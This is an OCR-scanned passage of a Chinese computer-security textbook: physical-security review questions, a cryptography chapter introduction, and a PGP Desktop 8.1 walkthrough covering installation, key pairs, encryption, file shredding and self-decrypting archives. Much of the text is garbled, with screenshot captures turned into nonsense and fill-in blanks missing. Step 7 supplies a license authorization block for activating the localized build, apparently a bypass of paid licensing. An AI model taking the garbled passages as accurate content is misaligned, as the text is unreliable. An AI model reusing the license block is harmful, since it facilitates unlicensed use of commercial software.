(1) 是 保护 计算 机 设备 .设施 (网 络 及 通信 线路 ) 免 遭 地 震 ,水 灾 、 火 灾 、. 有 害 气 
体 和 其 他 环境 事故 (如 电磁 污染 等 ) 破 坏 的 措施 和 过 程 。 

(2) 主要 是 指 对 计算 机 及 网 络 系统 的 环境 .场地 .设备 和 通信 线路 等 采取 的 安 
全 技术 措施 。 

(3) 物理 安全 包括 : 环境 安全 、 $ 和 通信 线路 安全 。 

(4) 是 所 有 电子 设备 正常 工作 的 能 量 源泉 ,在 计算 机 系统 中 占有 重要 地 位 。 

(5) 计算 机 的 电子 元 器 件 、 芯 片 都 密封 在 机 箱 中 ,有 的 芯片 工作 时 表面 温度 相当 高 ,一 
般 电 子 元 器 件 的 工作 温度 的 范围 是 A 

(6) 放置 计算 机 的 房间 内 ,湿度 最 好 保持 在 之 间 ,湿度 过 高 过 低 对 计算 机 的 可 
靠 性 与 安全 性 都 有 影响 。 

CD 机 房 三 度 要 求 是 : 环境 安全 、 国 和 洁净 度 。 

(8) 计算 机 对 电源 有 两 个 基本 要 求 : ` ° 

(9) 引起 计算 机 机 房 火灾 的 原因 一 般 有 : š 和 

2. 思考 与 简 答 题 


(1) 为 计算 机 系统 提供 合适 的 安全 环境 的 目的 是 什么 ? 

(2) 简 述 计算 机 机 房 的 外 部 环境 要 求 、. 内 部 环境 要 求 。 

(3) 简 述 中 国 香港 影星 的 艳照 门 事 件 对 个 人 隐私 的 警示 以 及 应 采取 的 安全 措施 。 
(4) 简 述 为 了 确保 供电 系统 的 安全 可 以 采取 哪些 措施 。 

(5) 简 述 静电 对 电子 设备 的 损害 所 具有 的 特点 。 

(6) 简 述 为 了 确保 网 络 通信 线路 的 安全 可 以 采取 哪些 措施 。 

(7) 简 述 有 哪些 对 电磁 辐射 的 防护 措施 。 

(8) 简 述 辐射 抑制 技术 。 
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本 章 学 习 目 标 

。 掌握 常用 的 加 密 方法 。 

。 了解 密码 学 的 基本 概念 。 

。 掌握 破解 用 户 密码 的 方法 。 

。 掌握 文件 加 密 的 方法 。 

。 理解 数字 签名 技术 。 

* fft PKI 的 组 成 原理 及 其 基本 功能 、 理 解 PKI 证 书 。 
。 掌握 构建 基于 Windows 的 CA 系统 。 


计算 机 安全 主要 包括 系统 安全 和 数据 安全 两 个 方面 ,数据 安全 主要 采用 现代 密码 技术 
对 数据 进行 安全 保护 ,是 保护 大 型 网 络 安全 传输 信息 的 唯一 有 效 手 段 ,是 保障 信息 安全 的 核 
心 技术 。 

密码 理论 与 技术 主要 包括 两 部 分 : 四 基于 数学 的 密码 理论 与 技术 ,包括 公 钥 密码 、 分 组 
密码 ,序列 密码 ,认证 码 数字 签名 、Hash 函数 、 身 份 识别 、 密 钥 管 理 .PKI 技术 等 ; @ 非 数学 
的 密码 理论 与 技术 ,包括 信息 隐形 ,基于 生物 特征 的 识别 理论 与 技术 ,量子 密码 等 。 

目前 国际 上 对 非 数 学 的 密码 理论 与 技术 非常 关注 ,讨论 也 非常 活跃 。 

信息 隐藏 将 在 未 来 网 络 中 保护 信息 免 于 破坏 起 到 重要 作用 ,信息 隐藏 是 网 络 环境 下 把 
机 密 信息 隐藏 在 大 量 信 息 中 不 让 对 方 发 觉 的 一 种 方法 。 特 别 是 图 像 生 加、 数字 水 印 、 潜 信 
道 、 隐 匿 协议 等 的 理论 与 技术 的 研究 已 经 引起 人 们 的 重视 。 

基于 生物 特征 (比如 手 形 .指纹 .DNA、 视 网 膜 .虹膜 .语音 脸形 等 ) 的 识别 理论 与 技术 
已 有 所 发 展 ,形成 了 一 些 理论 和 技术 ,也 形成 了 一 些 产品 。 

1969 年 美国 哥伦比亚 大 学 的 Wiesner 创造 性 地 提出 了 共 柜 编码 的 概念 ,遗憾 的 是 他 的 
这 一 思想 当时 没有 被 人 们 接受 。 十 年 后 , 源 于 共 轿 编码 概念 的 量子 密码 理论 与 技术 才 取 得 
了 飞速 的 进步 ,先后 在 自由 空间 和 商用 光纤 中 完成 了 单 光子 密 钥 交 换 协 议 ,英国 BT 实验 室 
通过 30km 的 光纤 信道 实现 了 每 秒 20kbit 的 密 钥 分 配 。 近 年 来 , 英 、 美 .日 等 国 的 许多 大 学 
和 研究 机 构 况 相投 入 量子 密码 的 研究 之 中 ,更 大 的 计划 在 欧洲 进行 。 到 目前 为 止 ,主要 有 三 
大 类 量子 密码 实现 方案 : 基于 单 光子 量子 信道 中 测 不 准 原理 的 ; 四 基于 量子 相关 信道 中 
Bell 原理 的 ; @ 基 于 两 个 非 正 交 量子 态 性 质 的 。 但 有 许多 问题 还 有 待 于 研究 。 比 如 ,寻找 
相应 的 量子 效应 以 便 提 出 更 多 的 量子 密 钥 分 配 协议 ,量子 加 密 理论 的 形成 和 完善 ,量子 密码 
协议 的 安全 性 分 析 方 法 研究 ,量子 加 密 算法 的 开发 ,量子 密码 的 实用 化 等 。 总 的 来 说 , 非 数 
学 的 密码 理论 与 技术 还 处 于 探索 之 中 。 

本 章 通过 实例 介绍 基于 数学 的 密码 理论 与 技术 的 实际 应 用 。 
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31 实例 : 使 用 加 密 软 件 PP 


随 着 信息 技术 的 不 断 发 展 ,信息 量 不 断 扩 大 ,数据 的 安全 性 和 保密 性 也 越 来 越 受 到 人 们 
的 重视 ,在 计算 机 应 用 领域 中 最 常见 的 就 是 以 字母 .数字 和 特殊 符号 组 成 的 密码 。 一 般 情 况 
下 ,密码 在 使 用 过 一 次 之 后 会 保存 在 本 地 系统 中 ,但 是 密码 会 根据 输入 环境 的 不 同 导 致 保存 
的 地 点 并 不 完全 一 臻 :有 的 密码 会 保存 在 内 存 的 临时 文件 中 ,有 的 则 会 保存 在 某 个 生成 的 加 
密 文件 中 。 

经 过 中 国 香港 的 艳照 门 事件 之 后 ,许多 网 友 都 对 自己 计算 机 里 的 一 些 隐 私 文件 的 保存 
问题 有 了 更 高 的 安全 要 求 。 无 论 是 黑客 人 侵 .计算机 丢失 、 计 算 机 送 修 等 都 可 能 会 导致 自己 
的 隐私 文件 泄露 。 为 了 避免 这 些 问 题 ,最 方便 快捷 的 方法 就 是 对 我 们 的 隐私 文件 进行 加 密 
处 理 。 让 别人 即使 拿 到 这 些 文件 ,也 会 因为 没有 密码 而 无 法 查看 ,从 而 保障 了 我 们 的 隐私 。 

PGP(Pretty Good Privacy) 是 全 球 著名 的 、 在 信息 安全 传输 领域 首选 的 加 密 软 件 ,其 技 
术 特 性 是 采用 了 非 对 称 的 * 公 钥 ” 和 * 私 钥 ” 加 密 体系 ,创造 性 地 把 RSA 公 匙 体系 的 方便 性 和 
传统 加 密 体系 的 高 速度 结合 起 来 ,可 以 用 来 加 密 文件 ,用 于 数字 签名 的 邮件 摘要 算法 ,加 密 
前 压缩 等 ,是 目前 最 难 破译 的 密码 体系 之 一 。 

由 于 美国 对 信息 加 密 产 品 有 严格 的 法 律 约束 ,特别 是 对 向 美国 ,加 拿 大 之 外 国家 散播 该 
类 信息 ,以 及 出 售 ,发布 该 类 软件 约束 更 为 严格 。 因 而 限制 了 PGP 的 一 些 发 展 和 普及 ,现在 
该 软件 的 主要 使 用 对 象 为 情报 机 构 ,政府 机 构 和 信息 安全 工作 者 。PGP 最 初 的 设计 主要 是 
用 于 邮件 加 密 ,如 今 已 经 发 展 到 了 可 以 加 密 整个 硬盘 、 分 区 文件 .文件 夹 ,并 集成 到 邮件 软 
件 中 进行 邮件 加 密 ,甚至 可 以 对 ICQ 的 聊天 信息 实时 加 密 。 

到 PGP 中 文 网 站 http://www. pgp. com. cn 下 载 PGP Desktop 8. 1 英文 版 和 PGP 
Desktop 8. 1 中 文 汉 化 安装 包 。 安 装 PGP 8. 1 简体 中 文 版 前 必须 先 安装 PGP 8. 1 英文 原 
版 。PGP 中 文 版 安装 密码 为 pgp. com. cn。 

1. 安装 PGP 

第 1 步 : 双击 运行 PGP8. exe, 进 入 安装 界面 , 单 击 Next 按钮 ,出现 License Agreement 
对 话 框 ,如 图 3-1 所 示 。 单 击 Yes 按钮 ,出 现 Read Me 对 话 框 ,如 图 3-2 所 示 。 


License Agreement. 4 Read Me 
Please read the lolowing icense agreement careful F Pleace read the lolowing ReadMe carehuly 


Press the PAGE DOWN key to see the rest of the agreement. 


PGP Corporation End User License Agreement — ^ PGP® 8.1.0 for Windows Release 
Notes 


BY CLICKING THE YES BUTTON OR INSTALLING THE 
SOFTWARE, YOU AGREE TO BE BOUND BY AND BECONE 

A PARTY TO THIS AGREENENT. IF YOU DO NOT AGREE Cot ea registered pedem M POP Coram a 
TO ALL OF THE TERNS OF THIS AGREEMENT, YOU MUST 

CLICK THE BUTTON THAT INDICATES THAT YOU DO NOT 

ACCKPT TEE TERMS NR THIS AGRRRWRNT ANN Yap mist — M 


SAC cor Ter he enit pocius cca trp ea Pa Thank you tor sing this PGP Corporation product These... 


eee [ox ] ow | Back 


3-1 License Agreement 对 话 框 图 3-2 Read Me 对 话 框 
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第 2 步 : 在 图 3-2 中 , 单 击 Next 按钮 ,出现 User Type 对 话 框 ,如 图 3-3 所 示 。 若 是 新 
用 户 ,需要 创建 并 设置 一 个 新 的 用 户 信息 。 单 击 Next 按钮 ,出现 Install Directory 对 话 框 ， 
如 图 3-4 所 示 ,选择 程序 的 安装 目录 。 


Uses Type [^ Install Directory 
Please el uci you have existing PGP Keyrings you'd ike to use: 1 Use the Brose button to select your dected destination lokder 


Do you akeady have PGP keying: you would ike to use? Setup wl instal PGP 81 in the folowing folder 


To matal to this lider, chck the Next button To instal to a diferent folder, cick the 
(p EAE Biome button and select another tolder 


C Niati sNews 


Destranon Folder 
d APGP Corporationi PGP for WindowsXP 


图 3-3 User Type 对 话 框 图 3-4 Install Directory 对 话 框 


第 3 步 : 在 图 3-4 中 , 单 击 Next 按钮 ,出 现 选 择 PGP 组 件 的 对 话 框 ,如 图 3-5 所 示 。 选 
择 磁 盘 加 密 组 件 、ICQ 实时 加 密 组 件 和 Outlook Express 邮件 加 密 组 件 。 单 击 Next 按钮 ,出现 
Start Copying Files 对 话 框 ,如 图 3-6 所 示 。 单 击 Next 按钮 ,进行 程序 的 安装 ,如 图 3-7 所 
示 。 最 后 再 根据 提示 (如 图 3-8 所 示 ) 重 启 系统 。 


Select Components 
Choose he components Setup wil install 


Stant Copying Files 
Review zetting: belore copying fles. 


Setup har enough rtomation to start copying the progam Her. If you want to review or 
urge ary senings. chek Back. I you ae salished wh tha vetings, cick Nest lo begin. 
opa hiec 


As a New user to PGP, we welcome you ard 
Mark you lor choosing our product 
[Operating System 
Microrot Windows XP. 
|Seected Component 
Space Requied on D: 
Space Avalbie on D: 


图 3-6 Start Copying Files 对 话 框 


Setup Status 


PGP 0.1 install complete 


PGPB1 has been successi nctaled Before you can use 


PGP Setup is performing the requested operatons. "he program: you must restat your compu 


instalng 。 PGPmailior Microsoft Dulock Express. 
ENWINDOWS stem TAVPGPoe dl 


m | 3% 


F Yer iwani io esai y Copier non] 


图 3-7 进行 安装 
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第 4 步 : 重启 


系统 后 ,双击 “PGP 简体 中 文 版 . exe”, 输 入 密码 后 单 击 “ 确 定 ” 按 钮 ,如 


图 3-9 所 示 ,然后 依次 按照 图 3-10 一 图 3-16 的 提示 进行 PGP 汉化 。 


1È POP 8. 1 简体 中 文化 版 安装 向 导 


[eee À | 
取消 


图 3-9 输入 密码 


qP PoP 8. 1 简体 中 文化 版 安装 向 导 


欢迎 使 用 pop 8.1 简 体 中 文化 版 安装 向 导 


i 
《 第 三 次 修正 ) 。 SAT, REET 


请 首先 确认 你 已 经 安装 了 PGP6.1 英 文 原版 4 撞 下 来 的 安 
EP ESLER FTN, 


加 果 你 是 第 一 次 使 用 PGP ,请 沪 问 www.pgp.com.cn 下 载 
FNR QA. 


图 3-10 ”欢迎 界面 


'GP 8. 1 简体 中 文化 版 安装 向 导 


OET ENTENTET 


-时 安装 和 使 用 中 需要 广 胡 的 问题 《 公 看 * E RIOT RUN D 》- 
|.  3NUFF GT SUSCI ger 8 GB c£ ， 不 可 用 于 其 性 低 所 本， 否则 
全 出现 一 些 问 题 、 

. 安装 后 请 在 Fof 巡 项 中 关闭 “自动 检查 更 新 ”, 否则 会 提示 从 rof 己 更 新 《官方 

| 的 PoP 9 英文 版 》， 而 PGP 98 功 能 出 未 完 得 ， 且 没有 寺村 的 “ 侈 费 补丁 ”， 不 推荐 更 

|i. OREI, BIETER AEN e. 

上 上。 PORTAIRA DIMENS » ER REES MAN rU 
EIRFA ey RIESTEROUCHLICUR > HIA EE SEIA 6 LENCE E 

| 由 面 B 及 类 试 汉化 每 个 能 使 用 列 有 李惠 ， 力 末 使 区 更 容易 被 中 国人 使 用 。 以 前 的 闫 本 

ETURA, SIRIETARIUB , 近 蔓 广 格 交付 到 了 一 个 相当 不 二 的 各 家 并 


OR 
ORTAR PKR) 


KOAN M U 


图 3-11 许可 证 协议 


P POP s. 1 简体 中 文化 版 安装 向 导 


[EE 


ORRREO 
WSURHUNDDAURIGE. (RENNRS . 


OBxsG) 
B Ramsmsescevsmswem. wimumpe 


diyprogram Fies\PGP CorporatonlPGP for Windows »P\ 


"H 


图 3-12 目的 地 文件 夹 


(P PGP s. 1 简体 中 文化 版 安装 问 导 


[rS 
FRUXSZGUSWOH. Red I— 5". ed qusB S. 


图 3-13 安装 类 型 


图 3-14 准备 安装 
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IP POP B. 1 简体 中 文化 版 安装 向 导 (B POP s. 1 简体 中 文化 版 安装 向 导 


| " | Plele e. 安装 向 导 完成 


区 安装 向 叶 成 功 地 安装 了 PPIE PLL. MEE 


时 4 mises. 
zn 


des: 


p 
[CLLTTTTTTITTTTTTITITITTITTIT] 


图 3-15 程序 正在 安装 图 3-16 ”完成 安装 


第 5 步 : 在 图 3-16 中 , 单 击 “ 完 成 "按钮 后 ,重启 系统 。 

注意 : 本 书 讲解 实例 时 采用 了 PGP 中 文 版 ,是 为 了 方便 读者 学 习 PGP 加 密 软件 的 使 
用 方法 。 如 果 要 加 密 重 要 的 文件 ,在 此 提醒 大 家 对 PGP 破解 版 或 者 中 文 版 一 定 要 谨慎 , 因 
为 PGP 是 美国 公司 制作 的 、 国 际 知名 的 加 密 软 件 , 它 的 使 用 是 收费 的 ,并 且 没 有 汉化 版 , 国 
内 的 破解 版 或 者 破解 汉化 版 可 能 被 放 入 了 木马 ,因此 ,正规 场合 一 定 要 选用 原版 软件 。 

第 6 步 : 重启 系统 后 ,在 图 3-17 中 右 击 任务 栏 的 小 锁 按 钮 ,选择 “许可 证 "菜单 项 ,出 现 
PGP 许可 证 授权 对 话 框 ,如 图 3-18 所 示 。 在 对 话 框 里 填 和 名称、 组 织 、 许 可 证 号 , 单 击 “ 手 
动 ” 按 钮 后 ,实现 本 地 验证 ,如 图 3-19 所 示 。 

T PcP 许可 证 授权 
请 输入 你 的 名 称 ,组织 ,和 许可 证 号 码 , 控 " 授 权 " 控 钮 自动 在 下联 网 上 授权 这 个 产品 , 


加 果 从 丰 接收 到 了 来 自 客户 服务 代表 的 一 个 许可 证 授权 ,你 可 使 用 廊 部 的 "手动 按 
pem HEIWAU. 


AERE 


SERO QD 名称 (N): [ese Desktop 


选项 @) 组 织 (0); [eer Enterprise — 


LC ri 


6 Pordisk 许可 证 号 (U 
YE Pepkeys [cucox |. [vews |- [kes ]- [Tener |- esue |.[ewc 


HE) PGPma; 
Bj rotes 加 果 你 没有 许可 证 号, 或 你 正在 评估 这 个 产品 立即 按 ' 购 买 按钮 获得 来 自我 们 的 在 
当前 窗口 中 人 


前 贴 板 (C) 稍 后 (D) 手动 (M) 立即 购买 (P) 确认 (! 


图 3-17 右键 菜单 图 3-18 PGP 许可 证 授权 


注意 : 重启 系统 时 会 自动 启动 PGPtray. exe, 这 个 程序 是 用 来 控制 和 调用 PGP 的 全 部 
组 件 的 ,如 果 觉 得 不 用 每 次 启动 时 自动 加 载 它 ,可 以 在 Windows 的 “开始 ”>“ 所 有 程序 ”一 
“启动 ”命令 中 删除 PGPtray 的 快捷 方式 。 

第 7 步 : 在 图 3-19 中 ,将 下 面 3 行 复制 到 图 3-19 中 。 


RDIRRPRRRAJ4gWeOov9Nr/gJl1TaVOz2ol1NExlzRCggvH4tuORrH1Swb22sB9Nmx7YC6w = 
————- END PGP LICENSE AUTHORIZATION 一 一 一 
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单 击 “确定 ?按钮 ,出现 如 图 3-20 所 示 对 话 框 , 单 击 “ 确 定 ” 按 钮 ,注册 成 功 。 


T PoP 许可 证 授权 2 
BR 5808 e BD, MTE A CREE SNB BabCE CERE ERERGET TR. 


ERUEEGHTASSPESIND NITERR SH EB Tu 
FIRAT. 


ee | [wows ]. Paw | frown ]- pee |- [ew | 


正确 相 中 许可 证 授权 在 下 面 的 输入 框 内 ,确定 舍 有 这 两 行 -一 -6EGIN PGP LICENSE 
AUTHCRIZATICM WI "—-END PGP LICENSE AUTHORIZATION-—". 


— BEGIN PGP LICENSE AUTHORIZATION—— 
DI NNGULTAVQu2oINE x1 2ACQgHtuO AMI Sib ZZB TYC 
上 -END PGP LICENSE AUTHORIZATION- 


末 评 可 证 时: TA 
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图 3-19 PGP 许可 证 授权 图 3-20 注册 成 功 


2. 创建 和 设置 初始 用 户 

第 1 步 : 在 图 3-17 中 ,选择 PGPkeys 菜单 项 。 出 现 PGPkeys 对 话 框 ,如 图 3-21 所 示 ， 
依次 选择 “ 密 钥 ”一 “新 建 密 钥 ”, 出 现 如 图 3-22 所 示 对 话 框 。 单 击 “ 下 一 步 ” 按 钮 ,出 现 如 
图 3-23 所 示 对 话 框 。 


DET 
欢迎 来 到 PGP 密 钥 生成 向 导 
人 和 人 人 和 先生 一 个 
SROEMIHSIA RR SBEL. 
—PEVINTI 12 PIS Tn ATELA 
A TIE SR T ROMS AURIS GS ERES, 
加 时 你 起 要 知道 更 多 关于 和 外 对 和 PGP 加 何 工作 的 入 
BRI RPG eye MIS. 
ET 
SCR HAC PHEROIS NO: 


[r3] 


上 -EEC 4 ) 


图 3-21 PGPkeys 对 话 框 (1) 图 3-22 欢迎 界面 


第 2 步 : 在 图 3-23 中 ,在 “全 名 ”处 输入 想 要 创建 的 用 户 名 ,在 "E-mail 地 址 ”处 输入 用 
户 所 对 应 的 电子 邮件 地 址 ,完成 后 单 击 “ 下 一 步 ” 按 钮 ,出 现 如 图 3-24 所 示 的 “分 配 密码 ”对 

第 3 步 : 在 图 3-24 中 的 “密码 ”处 输入 长 度 必须 大 于 等 于 8 位 的 密码 ,建议 为 12 位 以 
上 ,在 “确认 ”处 再 输入 一 次 ,最 好 不 要 取消 “隐藏 输入 ”的 选中 状态 ,这 样 即便 有 人 在 自己 的 
后 面 .也 不 容易 知道 输入 的 是 什么 ,更 大 程度 地 保护 了 密码 的 安全 。 然 后 单 击 “ 下 一 步 " 按 
钮 ,进入 密 钥 生成 进程 ,如 图 3-25 Bron. 等待 主 密 钥 和 次 密 钥 生成 完毕 (当前 状态 为 “ 完 
成 ”)。 单 击 “ 下 一 步 ” 按 钮 ,显示 “完成 PGP 密 钥 生成 向 导 ” 对 话 框 ,如 图 3-26 所 示 , 单 击 “ 完 
成 "按钮, 用户 就 创建 并 设置 好 了 ,如 图 3-27 所 示 。 
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分 本 姓名 和 电子 信箱 SS 
SI HEABHISR D EXGEIOIEZ 姓名 和 电子 全 菠 地 址 让 全 的 下 信人 知道 MORRA ETAR 这 些 信息 很 重要 且 是 机 灾 的 ,你 要 格 它 写 下 来， 
Pump SR ZUR I. 
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ER ERA, 
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图 3-23 分配 姓名 和 电子 信箱 图 3-24 “分 配 密码 ”对 话 框 


PcP 密 钥 生成 向 导 


aestate 
SVPERLRIKETAR MERT ERENLER. 


AEMP: 
v EEEREN 


v 正在 生成 交角 完成 PGP 密 钻 生成 向 导 


你 已 后 利生 成 要 外 对 - 
你 现在 将 能 外接 收 安 全 消息 并 签名 文档 


mue ER 
SU IRCSIERORK HAERES DE 
EN ERAS DT BEIRM 


(C ] 


图 3-25 “EAERI” IAHE 图 3-26 “完成 PGP 密 钥 生成 向 导 ” 对 话 框 


3. 导出 并 分 发 公 角 

为 了 实验 ,在 另 一 台 计 算 机 上 按照 上 面 方法 创建 一 个 test 用 户 。 从 这 个 “ 密 钥 对 ”内 导 
出 包含 的 公 钥 ,导出 公 钥 的 过 程 如 下 。 

在 PGPkeys 对 话 框 (类 似 图 3-27) 中 右 击 刚才 m -区 


创建 的 用 户 Ctest, 即 密 钥 对 ), 从 右键 菜单 中 选择 


“导出 ”, 在 出 现 的 “保存 "对话 框 中 ,确认 选中 “包含 
6.0 公 钥 ”, 然 后 选择 一 个 目录 ,再 单 击 “ 保 存 ” 按 
钮 , 即 可 导出 test 的 公 钥 ,扩展 名 为 . asc(test. asc) 。 

导出 公 钥 后 ,就 可 以 将 此 公 钥 放 在 自己 的 网 图 3-27 PGPkeys 对 话 框 (2) 

站 上 或 者 将 公 钥 直接 发 给 朋友 ,告诉 他 们 以 后 发 
邮件 或 者 重要 文件 时 ,通过 PGP 使 用 此 公 钥 加 密 后 再 发 给 自己 ,这样 做 能 更 安全 地 保护 自 
己 的 隐私 或 公司 的 秘密 。 

在 图 3-27 中 ,关于 密 钥 基 本 信息 中 的 有 效 性 是 指 PGP 系统 检查 密 钥 是 否 符合 要 求 , 如 
符合 ,就 显示 为 绿色 ; 另外 还 有 信任 度 、 大 小 、 描 述 、 密 钥 ID、 创 建 时 间 、 到 期 时 间 等 ,如 果 没 
有 这 么 多 信息 ,可 以 使 用 菜单 组 里 的 “查看 ”, 并 选中 里 面 的 全 部 选项 。 

注意 :“ 密 钥 对 ”中 包含 了 一 个 公 铀 (公用 密 钥 , 可 分 发 送 给 任何 人 ,别人 可 以 用 这 个 密 
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钥 对 要 发 给 你 的 文件 或 邮件 进行 加 密 ) 和 一 个 私 钥 (私人 密 钥 ,只 有 自己 所 有 ,不 可 公开 分 
发 ,此 密 钥 用 来 解密 别人 用 公 钥 加 密 的 文件 或 邮件 ) 。 

4. 导入 并 设置 其 他 人 的 公 钥 

第 1 步 : 导入 公 钥 。 双 击 对 方 发 给 你 的 扩展 名 为 . asc 的 公 钥 ,在 此 为 test. asc, 将 会 出 
现 选择 公 钥 的 窗口 ,如 图 3-28 所 示 ,在 这 里 可 以 看 到 该 公 钥 的 基本 属性 ,如 有 效 性 、 信 任 度 、 
大 小 等 。 选 好 一 个 公 钥 后 , 单 击 * 导 入 ”按钮 , 即 可 导入 PGP, 

第 2 步 : 设置 公 钥 属 性 。 打 开 PGPkeys 对 话 框 , 在 图 3-29 中 的 密 钥 列 表 中 可 以 看 到 刚 
导入 的 密 钥 (test) , 右 击 test, 选 择 “ 密 钥 属 性 ”命令 ,如 图 3-30 所 示 , 可 以 看 到 test 密 钥 的 全 
部 信息 ,比如 是 否 是 有 效 密 钥 , 是 否 可 信任 等 。 


ETS XM RAV seo SHV RIRO 用 户 组 2) PMV 
ane - 


Hm naw Ar ORA WE 


2010-6-2 
e? o GEE 2048/1024 2010-6-2 DDS: 


- ae 
A6 ries Ce 201062 a5 
图 3-28 选择 公 钥 图 3-29 PGPkeys 对 话 框 (3) 


test <jsjoscpu®l63. con: 7 区 
sa aea) 
p: penes 
类 型 (D: Poss 
AG): [501024 
SEE: wez 


Fd 3-30 test 属性 图 3-31 错误 信息 


注意 : 在 图 3-29 中 ,请 读者 注意 test 和 ztguang 在 描述 上 的 差异 (public key、key pair). 

在 图 3-30 中 ,如 果 直 接 将 “不 信任 的 ”的 滑 块 拉动 到 “信任 的 ”, 将 会 出 现 错误 信息 ,如 
图 3-31 所 示 。 正 确 的 做 法 应 该 是 关闭 此 对 话 框 (图 3-30)。 在 图 3-29 中 , 右 击 test ie FE" 
名 "命令 ,出现 *PGP 密 钥 签名 ”对 话 框 ,如 图 3-32 所 示 。 

单 击 “确定 ”按钮 ,会 出 现 *PGP 为 选择 的 密 钥 输入 密码 ”对 话 框 ,如 图 3-33 所 示 。 在 此 
输入 的 是 设置 用 户 ztguang 时 的 密码 ,然后 单 击 “ 确 定 ” 按 钮 , 即 完成 签名 操作 。 

在 图 3-34 中 , 密 钥 列表 中 可 以 看 到 密 钥 (test) 的 “有 效 性 ”显示 为 绿色 ,表示 该 密 钥 有 
Ak. didi test, 选 择 “ 密 钥 属 性 ”命令 ,在 图 3-30 中 ,将 “不 信任 的 ”的 滑 块 拉动 到 “信任 的 ”， 
然后 单 击 “ 关 闭 ” 按 钮 即 可 。 此 时 在 图 3-29 中 密 钥 test 的 “信任 度 ” 不 再 是 灰色 的 了 ,说 明 公 
H test 被 PGP 加 密 系 统 正式 接受 ,可 以 投入 使 用 了 。 关 闭 PGPkeys 对 话 框 时 ,会 出 现 要 求 
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备份 的 窗口 ,如 图 3-35 所 示 。 如 果 单 击 “ 立 
和 “ 私 钥 环 文件 ”进行 保存 


- 即 保存 备份 ”按钮 , 接 下 来 将 会 对 “ 公 
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图 3-32 


“PGP 密 钥 签名 ”对 话 框 3-33 


“PGP 为 选择 的 密 钥 输入 密码 ”对话 框 
MD MAV EFV SUD MIRO APNO Wo 
»arg pezzu cta 
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图 3-34 PGPkeys 对 话 框 (4) 


TRTO 


图 3-35 要 求 备 份 
5. 使 用 公 钥 加 密 文 件 
第 1 步 : 新 建文 件 pgp_encrypt. txt ,随意 输 入 的 内 容 是 “ 爱 上 对 方 收 到 风 萨 芬 撒旦 法 ”。 
第 2 步 : 如 图 3-36 所 示 , 右 击 文件 pgp_encrypt. txt, 在 右键 菜单 中 依次 选择 PGP 一 “加 
密 ” 命 令 ,将 出 现 *PGP 外 壳 一 密 钥 选择 ”对话 框 ,如 图 3-37 所 示 


CETT 大 小 
Q 2010/1024 


AI x 
naw 
suc 


BRE D 
L3 
Zea) 


mq 


图 3-36 fiii X f'F pgp encrypt. txt 图 3-37 “PGP 外 壳 一 密 钥 选择 对话 框 
第 3 步 : 在 图 3-37 中 ,可 以 选择 一 个 或 多 个 公 钥 ,上 面 窗口 是 备 选 的 公 钥 ,下 面 窗口 是 
准备 使 用 的 公 钥 。 在 此 选择 ztguang, 然 后 单 击 “确定 ”按钮 。 经 过 PGP 短暂 处 理 , 会 在 被 加 
密 文件 (pgp_encrypt. txt) 的 同一 目录 下 生成 一 个 格式 为 “加 密 文 件 名 . pgp” 的 文件 (pgp_ 
38 


encrypt. txt. pgp) ,这 个 pgp_encrypt. txt. pgp 文件 就 可 以 用 来 发 送 了 。 

注意 : 刚才 使 用 哪个 公 钥 (ztguang) 加 密 , 就 只 能 将 该 公 钥 发 送 给 公 钥 所 有 人 
(ztguang) ,其 他 人 无 法 解密 ,因为 只 有 该 公 钥 所 有 人 才 有 解密 的 私 钥 。 

第 4 步 : 解密 pgp_encrypt. txt. pgp 文件 。 如 图 3-38 所 示 , 右 击 文件 pgp_encrypt. txt. 
pgp ,在 右键 菜单 中 依次 选择 PGP 一 “解密 8. 效 验 ”命令 ,将 出 现 “PGP 外 过 一 输入 密码 ”对 
话 框 ,如 图 3-39 所 示 。 如 果 输 入 的 密码 不 正确 ,会 提示 重新 输入 密码 。 输 入 密码 正确 后 ,会 
将 加 密 文件 解密 到 用 户 指 定 的 目录 中 。 
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图 3-38 ” 右 击 文件 pgp_encrypt. txt. pgp 图 3-39 “PGP 外 壳 一 输入 密码 ”对 话 框 (1) 


第 5 步 : 如 果 要 加 密 文本 文件 ,并 且 和 希望 将 加 密 后 的 内 容 作 为 论坛 的 帖子 发 布 ,或 者 作 
为 邮件 的 内 容 发 布 , 那 么 在 图 3-37 中 选中 左下 角 的 “文本 输出 " 复 选 框 ,然后 单 击 “ 确 定 ” 按 
钮 。 经 过 PGP 短暂 处 理 , 会 在 被 加 密 文 件 (pgp_encrypt. txt) 的 同一 目录 下 生成 一 个 格式 为 
“加 密 文件 名 . asc” 的 文件 (pgp_encrypt. txt. asc) ,用 文本 编辑 器 打开 pgp_encrypt. txt. asc 
文件 ,如 图 3-40 所 示 ,加 密 后 文件 的 内 容 就 不 是 没有 规律 的 乱码 (如 果 不 选 择 此 项 ,输出 的 
加 密 文 件 pgp_encrypt. txt. pgp 将 是 乱码 ) ,而 是 很 有 序 的 格式 ,便于 复制 。 

第 6 步 : 使 用 PGPtray 解密 pgp_encrypt. txt. asc。 如 图 3-40 所 示 ,首先 用 文本 编辑 器 
打开 pgp. encrypt. txt. asc, 然 后 在 任务 栏 右 侧 右 击 小 锁 (PGPtray 图 标 ) ,依次 选择 “当前 窗 
口 ” 盖 解密 & 效 验 ” 命 令 ,会 出 现 解密 后 的 内 容 , 如 图 3-41 所 示 。 

补充 1: 安全 删除 文件 。 

有 时 候 , 不 希望 一 些 重要 的 数据 留 在 系统 里 面 .而 简单 的 删除 又 不 能 防止 数据 可 能 被 恢 
复 , 此 时 可 以 采用 PGP 的 粉碎 功能 来 安全 擦 除数 据 ,这 项 功能 进行 多 次 反复 写 和 人 来 达到 无 
法 恢复 的 效果 。 如 图 3-42 所 示 , 右 击 要 删除 的 文件 夹 (或 文件 ) .在 右键 菜单 中 依次 选择 
PGP 一 “粉碎 ”命令 。 

补充 2: 创建 自 解密 文档 。 

本 例 中 对 SDA_test 文件 夹 (文件 夹 中 最 好 包含 其 他 文件 ) 创 建 自 解密 文档 ,如 图 3-43 
所 示 , 右 击 SDA_test 文件 夹 ,在 右键 菜单 中 依次 选择 PGP 一 “创建 SDA” 命 令 。 然 后 弹出 
“PGP 外 过 一 输入 密码 ”对 话 框 ,如 图 3-44 所 示 ,在 该 对 话 框 中 输入 密码 (用 户 ztguang 的 密 
码 ) , 单 击 “确定 ”按钮 ,出 现 保 存 对 话 框 . 选 一 个 位 置 保 存 即 可 。 此 时 创建 的 自 解密 文档 是 
SDA test. sda. exe 文件 。 
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注意 : 自 解 密 文档 的 最 大 方便 之 处 是 没有 安装 PGP 软件 的 计算 机 也 可 以 进行 解密 。 
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图 3-42 ”删除 文件 
